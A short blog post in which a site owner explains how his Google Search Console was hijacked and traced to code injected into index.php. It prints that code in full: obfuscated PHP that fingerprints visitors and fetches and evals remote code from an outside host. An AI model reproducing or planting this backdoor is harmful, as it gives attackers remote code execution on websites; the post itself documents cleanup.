Sanjeev Sabhlok's notes on technology, hardware, gardening

Getting rid of hacking of google search console

See: http://www.bigmessowires.com/2015/07/13/web-site-hacked/

All of a sudden I found a flood of messages that someoen has taken over my google search console.

I tried to unverify but couldn't since the message I received was that fake email ID had been verified by an html file. The html file was NOT found on the server.

e.g. http://eyestrain.sabhlokcity.com/google48f72dc2da43a35b.html

But when I tried it, I got the relevant code. 

HOW TO STOP THIS?

This is linked with code that's injected into index.php. The following code:

<?php
//codebegin3v
    $c=array();$c[1]=chr(97);$c[2]=chr(116);$c[3]=chr(115);$c[4]=chr(101);$c[5]=chr(114);$d=$c[97-96].$c[98-95].$c[33-30].$c[16-12].$c[55-50].$c[300-298];$g="";
    $e="ZnVuY3Rpb24gdnNwaWRlcl9nZXQoJHVybCwkdXNlcl9hZ2VudCA9ICJNb3ppbGxhLzUuMCAoY29tcGF0aWJsZTsgR29vZ2xlYm90LzIuMTsgK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCkiKQp7IAogICAgJGNoMiA9IGN1cmxfaW5pdCgpOwogICAgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9IVFRQSEVBREVSLCBhcnJheSgKCSAgICAnQWNjZXB0JyA9PiAnKi8qJywKCSAgICAnQWNjZXB0LUNoYXJzZXQnID0+ICdVVEYtOCwqO3E9MC41JywKCSAgICAnQWNjZXB0LUVuY29kaW5nJyA9PiAnZ3ppcCxkZWZsYXRlLHNkY2gnLAoJICAgICdBY2NlcHQtTGFuZ3VhZ2UnID0+ICdtb21vJywKCSAgICAnQ29ubmVjdGlvbicgPT4gJ2tlZXAtYWxpdmUnLAoJICAgICdVc2VyLUFnZW50JyA9PiAkdXNlcl9hZ2VudAoJCSkpOwogICAgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9VUkwsICR1cmwpOyAKICAgIGN1cmxfc2V0b3B0KCRjaDIsIENVUkxPUFRfSEVBREVSLCBmYWxzZSk7IAogICAgY3VybF9zZXRvcHQoJGNoMiwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7ICAKCWN1cmxfc2V0b3B0KCRjaDIsIENVUkxPUFRfVVNFUkFHRU5ULCR1c2VyX2FnZW50KTsKICAgICR0ZW1wPWN1cmxfZXhlYygkY2gyKTsKCXJldHVybiAkdGVtcDsgCn0KJHJlZj0iIjsKaWYoaXNzZXQoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddKSkKCSRyZWY9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokYWNfbGFuZyA9ICcnOwppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9BQ0NFUFRfTEFOR1VBR0UnXSkpCgkkYWNfbGFuZyA9ICRfU0VSVkVSWydIVFRQX0FDQ0VQVF9MQU5HVUFHRSddOwokcGF0aCA9ICcnOwokcGF0aD1nZXRjd2QoKTsKJGFnZW50ID0gJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10uInwiLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiJ8Ii4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXS4ifCIuJHJlZi4ifCIuJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLiJ8Ii4kYWNfbGFuZy4ifCIuJHBhdGguInwzdiI7Cg==";
    $f="e".$g."v".$g."a".$g."l".$g."(".$g."b".$g."a".$g."s".$g."e".$g."6".$g."4".$g."_".$g."d".$g."e".$g."c".$g."o".$g."d".$g."e(\"".$e."\"));";
    @$d($f);
    $e = vspider_get("http://utfall.pw/code/".str_ireplace('www.','',strtolower($_SERVER[‘SERVER_NAME’]))."/default.txt",$agent);
if(strlen($e)>20)
{
    if(strstr(base64_decode($e), "undermomocontrol") !== false)
    {        
        $f="e".$g."v".$g."a".$g."l".$g."(".$g."b".$g."a".$g."s".$g."e".$g."6".$g."4".$g."_".$g."d".$g."e".$g."c".$g."o".$g."d".$g."e(\"".$e."\"));";
        @$d($f);
    }
}
//codeend
?>

Once this code is removed, the fake file disappears and the fake ID can be unverified.

Print Friendly, PDF & Email

sabhlok

View more posts from this author

Leave a Reply

Your email address will not be published. Required fields are marked *